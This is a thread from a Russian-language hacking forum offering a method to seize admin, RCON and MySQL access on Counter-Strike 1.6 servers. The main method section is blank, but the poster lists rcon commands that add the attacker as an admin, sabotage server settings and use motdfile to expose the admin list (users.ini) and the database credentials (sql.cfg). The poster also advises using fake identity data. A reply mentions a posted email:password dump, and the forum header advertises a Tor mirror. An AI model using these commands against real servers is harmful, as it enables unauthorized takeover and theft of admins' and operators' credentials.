Взлом сервера Cs 1.6 Админка \ Ркон \ Mysql

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

Include

Участник

Include

Участник
24 Май 2016
181
194
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Приветствую !
Хотелось бы рассказать вам о способе Взлома сервера на админку \ ркон \ mysql
Сразу скажу , способ есть в интернете , но он лежит на самом дне.На данном форуме я не нашёл его)
По этому что это "баян" писать не нужно.Если вы его видели , это не значит что сотни других пользователей его видело)

И так , когда вы уже собрались читать и хотите себе халявную админку , то присядьте по удобнее)

Нам потребуется;


Вроде бы всё рассказал.Как зайти в базу я расскажу если будет статья полезная и "троллинга" в мою сторону не будет.
Хостинг который я предпочитаю - Myarena ( Not advertising )
Внимания ! Не в коем случае не берите тест сервера на хосте csserv , ибо там уже пофиксили после нас всё) Теперь у них повысился уровень защиты.
Позже запишу видео , и прикреплю его к записи если кто то что - то не понял.Так - же всё расскажу , и объясню если что то не понятно.(В приделах разумного)
Это моя первая тема , так что ещё раз попрошу:Если кому то не понравилось , просто пройдите мимо.Спасибо !
Так - же повторюсь , если данный способ тут имеется , я удалю тему.

Возможно что то не дописал , а может что то и не так написал.Желательно делать всё через левые данные.Если что не так , пишите в коммент , буду рад ответить.
Вроде бы всё.
Если будет всё Good допишу тему и способы слив всех админов с сервера через motd окно.


*Обновленно 21/03 4:47;
Команды которые часто используются;
rcon sv_gravity "10" Гравитация ( думаю понятно )
rcon sv_maxspeed "10" - Скорость игрока ( что бы не кто не мог ходить )
rcon mp_startmoney "800" - Устанавливает деньги в начале раунда.
rcon sv_password "пароль" - Устанавливает пароль на сервер)
rcon amx_addadmin "Ваш ник" "abcdefghijklmnopqrstu" "Ваш пароль" "name" - Прописывает адм
rcon motdfile addons/amxmodx/configs/users.ini - Сливает всю базу админов через Motd ( если админки по User.ini )
rcon motdfile addons/amxmodx/configs/sql.cfg - Сливает всю логин и пароль от бд через Motd
 
  • Лайк
Reactions: RG45UDP

MrSmitix

Юзер

MrSmitix

Юзер
14 Сен 2015
301
89
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Годный способ, видел где то что то в этом роде но не пробывал. Если кто то попробует отпишитесь.
--- Пост обновлен ---
под имя откроешь?
Читай правила, если хочешь просить под личный то пиши в лс автору, да и я бы на его месте новорегу не дал ghhhhhhv322w
 

ZUUXIK

Участник

ZUUXIK

Участник
10 Авг 2016
29
24
Блин, не хватает симпатий, так бы попробывал
 

AnGel

Администратор
Команда форума

AnGel

Администратор
Команда форума
27 Авг 2015
3,411
2,025
ZUUXIK, просто развивайтесь)
 

ZUUXIK

Участник

ZUUXIK

Участник
10 Авг 2016
29
24
ZUUXIK, просто развивайтесь)
ну так, 1 темку вроде как заливал, на мыло:пароль, получил 15 симпатий. У меня все хорошо с этим) правда чет, нет особого что залимвать, есть тольок рабочие скрипты для доты, но я не знаю в какую тему заливать
 

AnGel

Администратор
Команда форума

AnGel

Администратор
Команда форума
27 Авг 2015
3,411
2,025
ZUUXIK, если скрипты WEB, то есть соответствующая тема для этого)
Если ПО, то в прочее в разделе программ
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя